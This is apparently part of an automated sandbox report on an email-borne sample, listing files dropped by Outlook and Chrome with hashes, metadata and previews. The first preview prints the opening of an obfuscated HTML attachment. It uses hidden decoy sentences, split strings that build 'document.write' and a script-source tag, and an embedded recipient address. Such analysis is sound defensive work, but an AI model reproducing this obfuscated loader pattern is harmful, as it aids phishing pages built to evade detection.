                                                                Preview:<html> <strong> She sewed a dress for the upcoming event. </strong> --><script>..</script>..<span style='display:none;'> The musician performed at the local cafe. </span> ..<script>..kelp = `#dlaurence.brochu@metalus.qc.ca`;..</script>..<strong style='display:none;'> The dog wagged its tail excitedly. </strong>..<script>.. /* koala */ giraffe /* tulip */=['w', 'ri','te'].join('') /* jackfruit */;..</script>.. <b> She explored the old, abandoned house. </b> -->..<script> upupa =['<s','cri','pt s','rc='].join('') /* acacia */;..</script>..<h1 style='display:none;'> She sang a lullaby to help the baby sleep. </h1>..<script></script>.. <b> The family went on a camping trip in the woods. </b> -->..<script>..function durian(jaguar) {.. /* She knitted a warm scarf for the winter season.
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:RFC 822 mail, ASCII text, with very long lines (1945), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):0
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:336A64B67B42BBA00A16D92F10570CB0
                                                                SHA1:9B652EBF2B4DE1C25013B807B79426C97405D85A
                                                                SHA-256:D9EE22FF7E1C1D0BA37D1085CDF8DB09788EE96DE935FD19E1D32621BB4EB16C
                                                                SHA-512:D3D8D1361A43ABD7682450F1D83A9385467BC24B668848890D2A2F4E186590EF2C13ED3EA1ADC58D903026637EAE943821E3DBA4EEFB3865995D2F75FAE6F674
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:Received: from YT2PR01MB9794.CANPRD01.PROD.OUTLOOK.COM.. (2603:10b6:b01:dd::9) by YTBPR01MB3149.CANPRD01.PROD.OUTLOOK.COM with.. HTTPS; Mon, 7 Oct 2024 12:20:43 +0000..Received: from YT4PR01CA0347.CANPRD01.PROD.OUTLOOK.COM.. (2603:10b6:b01:fc::18) by YT2PR01MB9794.CANPRD01.PROD.OUTLOOK.COM.. (2603:10b6:b01:dd::9) with Microsoft SMTP Server (version=TLS1_2,.. cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.8026.22; Mon, 7 Oct.. 2024 12:20:36 +0000..Received: from YT2PEPF000001CE.CANPRD01.PROD.OUTLOOK.COM.. (2603:10b6:b01:fc:cafe::30) by YT4PR01CA0347.outlook.office365.com.. (2603:10b6:b01:fc::18) with Microsoft SMTP Server (version=TLS1_2,.. cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.8026.23 via.. Frontend Transport; Mon, 7 Oct 2024 12:20:36 +0000..Received: from EUR03-AM7-obe.outbound.protection.outlook.com.. (40.107.105.102) by YT2PEPF000001CE.mail.protection.outlook.com.. (10.167.241.37) with Microsoft SMTP Server (version=TLS1_2,.. cipher=TLS_ECDHE_RSA_WITH_AES_25
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:[ZoneTransfer]..ZoneId=3..
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:RFC 822 mail, ASCII text, with very long lines (1945), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):35812
                                                                Entropy (8bit):6.0461135736123275
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:336A64B67B42BBA00A16D92F10570CB0
                                                                SHA1:9B652EBF2B4DE1C25013B807B79426C97405D85A
                                                                SHA-256:D9EE22FF7E1C1D0BA37D1085CDF8DB09788EE96DE935FD19E1D32621BB4EB16C
                                                                SHA-512:D3D8D1361A43ABD7682450F1D83A9385467BC24B668848890D2A2F4E186590EF2C13ED3EA1ADC58D903026637EAE943821E3DBA4EEFB3865995D2F75FAE6F674
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:Received: from YT2PR01MB9794.CANPRD01.PROD.OUTLOOK.COM.. (2603:10b6:b01:dd::9) by YTBPR01MB3149.CANPRD01.PROD.OUTLOOK.COM with.. HTTPS; Mon, 7 Oct 2024 12:20:43 +0000..Received: from YT4PR01CA0347.CANPRD01.PROD.OUTLOOK.COM.. (2603:10b6:b01:fc::18) by YT2PR01MB9794.CANPRD01.PROD.OUTLOOK.COM.. (2603:10b6:b01:dd::9) with Microsoft SMTP Server (version=TLS1_2,.. cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.8026.22; Mon, 7 Oct.. 2024 12:20:36 +0000..Received: from YT2PEPF000001CE.CANPRD01.PROD.OUTLOOK.COM.. (2603:10b6:b01:fc:cafe::30) by YT4PR01CA0347.outlook.office365.com.. (2603:10b6:b01:fc::18) with Microsoft SMTP Server (version=TLS1_2,.. cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.8026.23 via.. Frontend Transport; Mon, 7 Oct 2024 12:20:36 +0000..Received: from EUR03-AM7-obe.outbound.protection.outlook.com.. (40.107.105.102) by YT2PEPF000001CE.mail.protection.outlook.com.. (10.167.241.37) with Microsoft SMTP Server (version=TLS1_2,.. cipher=TLS_ECDHE_RSA_WITH_AES_25
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:ASCII text, with very long lines (28729), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):20971520
                                                                Entropy (8bit):0.1768910322312317
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E90352081AD9FB76B9FB2BCA559B953D
                                                                SHA1:4F00AD6541DA9F64E43E719CF2A9B434E84777C3
                                                                SHA-256:5A033AAE1484B606AEFBAA3E3F06631DC68FEF4A7F70A7543E394C4F9AEDC221
                                                                SHA-512:FFC5B9B8B908E2120776DF84F3652FD3A8B732FC75245BA642059268AAE4E57D46061E1079F2C9B0F17CF9B108B922C96F458ACFAA738CF24545ADA5BB879E6A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..10/07/2024 12:35:18.675.OUTLOOK (0x1A48).0x1A80.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":21,"Time":"2024-10-07T12:35:18.675Z","Contract":"Office.System.Activity","Activity.CV":"DYBnD+bklUyDTsRL+g9PTA.4.9","Activity.Duration":18,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...10/07/2024 12:35:18.691.OUTLOOK (0x1A48).0x1A80.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":23,"Time":"2024-10-07T12:35:18.691Z","Contract":"Office.System.Activity","Activity.CV":"DYBnD+bklUyDTsRL+g9PTA.4.10","Activity.Duration":10302,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorV
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):20971520
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):126976
                                                                Entropy (8bit):4.536476387514355
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:33B86965F991417FA5E6EA744AB5482E
                                                                SHA1:FEA236C8EC8005F160E82145DCE12602A2823FB2
                                                                SHA-256:B4586F773BA531EE27C7E1CDF97D3DD8CB3C4EAE48E3A7A7302BC85D300FD145
                                                                SHA-512:1A716FF9CDD9D9A9842BBE4297823490A7188FAF1408BB81A2FB9991B15187BFC6079876DD1F1758D488C2615B7D27A3ED2C53D07206D8A5F8D6F4D4A33C55A6
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:............................................................................`.......H......^....................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................<.6.Y.............^............v.2._.O.U.T.L.O.O.K.:.1.a.4.8.:.4.3.3.7.1.7.2.7.c.0.3.8.4.a.7.2.9.b.7.6.3.d.3.e.a.b.1.7.5.c.7.c...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.1.0.0.7.T.0.8.3.5.1.8.0.4.3.7.-.6.7.2.8...e.t.l.......P.P.....H......^............................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):16384
                                                                Entropy (8bit):3.57364353833829
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9B52892D8ED978D97F93677B8AD97C81
                                                                SHA1:A8E2A184DACE2760265BD83EB2465E79913179E4
                                                                SHA-256:6ADB5963DAC23252B13FC76D37A19B99AE2F35C3039A610001AE5FC374A78A82
                                                                SHA-512:3ADF1EF84D79FB2EB4EFDF82CF9E4542ACD92E9B03CFB5C6E19F4E4D28A27BA4AD888E5F71C583455B9E58FCF2087DA3630662E022A9F3235E838086281D1E70
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:............................................................................^.......`...u$8r....................eJ.......x?r....Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................<.6.Y..........u$8r............v.2._.O.U.T.L.O.O.K.:.d.6.0.:.a.b.a.1.1.6.6.5.8.8.0.e.4.7.b.b.8.4.f.5.3.6.a.5.9.c.0.3.c.6.9.5...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.1.0.0.7.T.0.8.3.5.5.2.0.1.8.3.-.3.4.2.4...e.t.l.........P.P.....`...u$8r............................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:CDFV2 Microsoft Outlook Message
                                                                Category:dropped
                                                                Size (bytes):49152
                                                                Entropy (8bit):3.418278218655233
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A0AD84AF1BD81D108081B4CBBF400387
                                                                SHA1:72AC4A6B924B768C2D04D725936179B68773A4DE
                                                                SHA-256:DC9EB11B5D2FEA8E4AD1034F253A1B36E8420398B6B4746561849F141EE143BC
                                                                SHA-512:8AF68DFF4F6187A22B92F85FCB8152982DB7D06095FBE1DB3A4C73A1B430195B85B03DC45114C727C38D7C723E55B18B79D93D4C887A526BB6A0F351EBE05EA8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...........................................................................................u................_._.p.r.o.p.e.r.t.i.e.s._.v.e.r.s.i.o.n.1...0...................0...................................................!..........._._.n.a.m.e.i.d._.v.e.r.s.i.o.n.1...0...........................(...........,.........................u......u................_._.s.u.b.s.t.g.1...0._.0.E.0.4.0.0.1.F.........................*.......................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):204800
                                                                Entropy (8bit):0.8910486270417217
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3A053CE8D2D8D982981CDB25B20C6D91
                                                                SHA1:56496DB973A23B01E876C876878E774D524CA7AD
                                                                SHA-256:D848AFB5E91DC1EF99DCF15AEECD2FD7438D7C3F88162BE352C3A6D494BCFFD9
                                                                SHA-512:DC1AF8FC4D75509C6ECCFF12E19A002C57BE5791431939C502331ED93304A8858F96CF44FCE1133D461CFB933446DFEA627BCBB1E80A720B9AC0010ECC485C53
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):30
                                                                Entropy (8bit):1.2389205950315936
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0722C0AB508D8E7397110E97ACFD5A0E
                                                                SHA1:94090705EB6E415809AB98C23DBF2A4E0506DB77
                                                                SHA-256:8120CAD11525C837C33EE660490C0ABA73766ED63DD5222057F509B607294555
                                                                SHA-512:EF97B75FE05E1994C6ECB95F95187E8466BFFAE8B8F36683FA3F61DA8B7DCB551B10742E2E26E8FF88B9E9087C244323E577596B099D9FCE9C5D1455C6842F92
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:..............................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):16384
                                                                Entropy (8bit):0.6696218429171772
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9CE7DD865584EE765B021B2E25BA1B62
                                                                SHA1:73F231C20F3F9062F8F37C761E60E0023B40374B
                                                                SHA-256:D4BBBF4744B7E7140F6717CA46CAEEF325D2DBBED0FB370F1CB7E1C8AA35335E
                                                                SHA-512:17A7710205D601F27BAC3C3C2401C36350AD4698BDC4337382AED00129CC63C54F89BCCF99F391F3DAF81B9987EF4719B0D0AEA97DBDBB134CE25B7CF5CCD708
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 11:35:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2673
                                                                Entropy (8bit):3.9792360659239656
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C72FF23779F855862A44416AAB3BCAD5
                                                                SHA1:FBB056AEE8FB1C61E10A7ED749ECC5E42FD4F7A2
                                                                SHA-256:AE8E60E86688E66E027FEB14DD8C5AD9B4EB2FA9F96CB874BD777099BC351529
                                                                SHA-512:B938B2E04D06B3FD99A9CDCBC621F73E0C50DFA102FB13DFEF13D932310D96F7FF9947E22DECA7A0711C444B4DBD3B0926A4E74CC03FE3540187AAE29AC28D30
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,......3h....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGY`d....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGYqd....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGYqd....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGYqd..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VGYrd...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........."........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 11:35:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2675
                                                                Entropy (8bit):3.995237636148533
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:46E5D0D94D51034C1883C5870CC2BCAE
                                                                SHA1:34E11B3DBAFFD3BE36EE2093BC20880EB8759A40
                                                                SHA-256:2F3C947800931C214696D4FE6E6542024D3A3D79AA05D68D014FCCE85047E89D
                                                                SHA-512:1BF1D3F47C84FBAF6285CA747A47EF8E75C3106DF514AB8AC963621A8360A1A4749761EC32D5C661128C1A9F4C8E91715B82F97E3462CA40F260CBB1542B79E5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,......'h....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGY`d....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGYqd....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGYqd....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGYqd..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VGYrd...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........."........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2689
                                                                Entropy (8bit):4.007232442842761
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DCEE94E244863120114308C3D4D67ADD
                                                                SHA1:8AAFC820CC39A525D63855CCD53559DE49FACB79
                                                                SHA-256:91C963B7C668682256FDE4B2D203C724162E3A1B08C76C25188C4AE5F37EAA19
                                                                SHA-512:290CD4CCF1018EFFA504F06F68F88EC79B0311CE4F9536785B0A391415F2942BA7EAE67648B67810B9FA8D6B9A60E65C59DCCA8AE95C969E4956205C06C9F075
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGY`d....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGYqd....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGYqd....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGYqd..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........."........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 11:35:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2677
                                                                Entropy (8bit):3.996938396671624
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:428918CE913361EC0ADAB1516F00D80F
                                                                SHA1:957A2BF2E68E5F3B07B97087943A3A9C35C881F3
                                                                SHA-256:90AD053160C243420F3A089AF7BAF962C26E6F34C28CE09EB7D1632ED648CB94
                                                                SHA-512:963F5A6E25082CBF373A202F6E2897BD8EA6F4C5DD2CBE2B18D8DB8A6AFFB5BB312209A4D73C1E99C7DF1F3471BF24C63615597A60B7C588544C1AA1A8A056D9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,......!h....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGY`d....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGYqd....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGYqd....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGYqd..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VGYrd...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........."........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 11:35:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2677
                                                                Entropy (8bit):3.9820885451557695
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AD23EF4CD0094EB17E2BB9CC7079F8F8
                                                                SHA1:77C5A58B07D6634A2F4AE7C54325A127FC387CDC
                                                                SHA-256:9FFB143BE801674ED50A63EE071BB4FE37AD380D99AEE422DE637FE9236EF4AA
                                                                SHA-512:7B312F1F968616F9CB8BDEDF9F95315A931F5801C97F857CFB7B69ABD417B18BAAE463A1DEB76AAE3228FF318EB6BC79F8CDBE9BA2D93BBDB88EED92F1FF6FFF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,......-h....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGY`d....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGYqd....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGYqd....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGYqd..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VGYrd...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........."........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 11:35:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2679
                                                                Entropy (8bit):3.988929953891046
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A9AC14C19FB92E13404EE2CD60F9D40A
                                                                SHA1:3F1B9930631603EB16302D70CF30A2E89A40FA84
                                                                SHA-256:FC6EC8B7062F519DFC2BBC200C68C39D7165F79B82141D7FF9156BB80EFE9E82
                                                                SHA-512:B191F350F3AD55D35B520956A2E06D85A3AC47A222B66025064AA2CA4395D767C1261247EABDE45017D0EDAACC3750B4B0AAC159C4FEC2463E0746A81281937F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,.......h....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGY`d....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGYqd....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGYqd....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGYqd..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VGYrd...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........."........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
